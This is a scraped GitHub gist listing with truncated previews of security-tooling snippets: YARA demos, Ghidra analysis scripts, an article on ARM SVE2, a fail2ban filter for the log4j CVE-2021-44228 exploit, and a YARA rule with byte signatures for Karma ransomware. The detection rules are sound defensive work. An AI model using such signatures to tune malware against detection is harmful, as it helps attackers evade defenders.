How to use:
./wordle.sh
Or try the unlimit mode:
tlansec
/ externals_example.py
Created
February 21, 2022 10:08
Simple script to demo use of yara-python + externals
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simple script to demo use of yara-python + externals | |
| # think of all the externals you could define! | |
| import os | |
| import sys | |
| import yara | |
| example_rule = ''' | |
| rule demo_externals | |
| { |
matterpreter
/ RpcParser.java
Last active
March 9, 2022 00:21
Ghidra RPC procedure identification script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Locate RPC procecures inside of server code | |
| //@author Matt Hand (@matterpreter) based on original work by Sektor7 Labs (@reenz0h) | |
| //@category Functions | |
| //@keybinding | |
| //@menupath | |
| //@toolbar | |
| import ghidra.app.script.GhidraScript; | |
| import ghidra.program.model.block.*; | |
| import ghidra.program.model.symbol.*; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| This was the first version - the newer version also includes *When* it was loaded also. | |
| https://gist.github.com/olliencc/e166a64ca211c51eb69111f26ce57bc1 | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Attempts to demangle all mangled symbols in the current program using the Rust | |
| # mangling schemes, and replace the default symbol and function signature | |
| # (if applicable) with the demangled symbol. | |
| # | |
| # License: MIT OR Apache-2.0 | |
| #@author Jack Grigg <[email protected]> | |
| #@category Symbol | |
| import string |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from os import urandom | |
| from socket import create_connection | |
| from cryptography.hazmat.primitives.asymmetric import padding | |
| from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes | |
| from cryptography.hazmat.primitives.serialization import load_der_public_key | |
| def read(sock, length): | |
| result = b'' |
zingaburga
/ sve2.md
Last active
October 24, 2025 04:03
ARM’s Scalable Vector Extensions: A Critical Look at SVE2 For Integer Workloads
Scalable Vector Extensions (SVE) is ARM’s latest SIMD extension to their instruction set, which was announced back in 2016. A follow-up SVE2 extension was announced in 2019, designed to incorporate all functionality from ARM’s current primary SIMD extension, NEON (aka ASIMD).
Despite being announced 5 years ago, there is currently no generally available CPU which supports any form of SVE (which excludes the [Fugaku supercomputer](https://www.fujitsu.com/global/about/innovation/
jaygooby
/ log4j-jndi.conf
Last active
October 13, 2025 15:04
fail2ban filter rule for the log4j CVE-2021-44228 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # log4j jndi exploit CVE-2021-44228 filter | |
| # Save this file as /etc/fail2ban/filter.d/log4j-jndi.conf | |
| # then copy and uncomment the [log4j-jndi] section | |
| # to /etc/fail2ban/jail.local | |
| # | |
| # [email protected] | |
| # https://jay.gooby.org/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228 | |
| # https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949 | |
| # Thanks to https://gist.github.com/kocour for a better regex | |
| # |
blotus
/ log4j_exploitation_attempts_crowdsec.md
Last active
December 29, 2023 12:24
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community
This list is no longer updated, thus the information is no longer reliable.
You can see the latest version (from october 2022) here
herrcore
/ karama.yara
Created
November 22, 2021 18:16
Yara rule generated with Binlex from our live stream https://youtu.be/hgz5gZB3DxE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule malware_karama_0 { | |
| meta: | |
| descrption = "Karma Ransomware" | |
| strings: | |
| $name = "KARMA" ascii wide nocase | |
| $trait_0 = {33 f6 0f b7 41 ?? 83 c1 02 8b d0 66 85 c0 75 da} | |
| $trait_1 = {0f b7 d0 66 83 fa 5c 74 10} | |
| condition: | |
| uint16(0) == 0x5a4d and | |
| uint32(uint32(0x3c)) == 0x00004550 and |
NewerOlder